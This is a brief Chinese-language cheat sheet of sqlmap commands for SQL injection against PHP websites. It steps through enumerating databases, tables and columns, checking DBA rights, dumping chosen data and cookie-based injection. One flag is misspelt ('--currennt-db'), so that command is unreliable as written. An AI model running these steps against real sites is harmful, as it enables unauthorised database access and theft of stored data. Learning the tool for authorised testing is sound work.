1.sqlmap -u 網址
-u 檢測是否存在注入點 返回數據庫的名字
2.sqlmap -u 網址 --tables 列出全部表(猜解模式)
3.sqlmap -u 網址 --columns -T “表名” (- columns猜列名 –T表名)
4. sqlmap -u 網址 --dump -C “列名,列名” -T “表名” (dump下載數據 –C“”列名)
SQLMAP 及PHP網站滲透
1.sqlmap -u 網址
2.sqlmap -u 網址 --is-dba(測試是否是dba權限)(是dba權限可以直接寫文件)
3. sqlmap -u 網址 --dbs 列出所有數據庫
4. sqlmap -u 網址 --currennt-db 查找自己的數據庫
5. sqlmap -u 網址 --tables –D “當前數據庫名” 查詢所有數據表名 根據當前數據庫查詢
6. sqlmap -u 網址 --columns -T “表名” -D “數據庫名”
7. sqlmap -u 網址 --dump -C “列名,列名” -T “表名” -D“數據庫名”
SQLMAP之cookie注入
1. sqlmap -u 網址(去掉id=xx) --cookie “id=xx” --level 2
--cookie “”這裏寫ID的參數如果是cookie注入,就要把的等級提升爲2
2. sqlmap -u 網址(去掉id=xx) --tables --cookie“id=xx”--level 2
3. sqlmap -u 網址(去掉id=xx)--columns -T“表名” --cookie“id=xx”--level 2
4. sqlmap -u網址(去掉id=xx)--dump -C“列名,列名” -T“表名” --cookie “id=xx” --level 2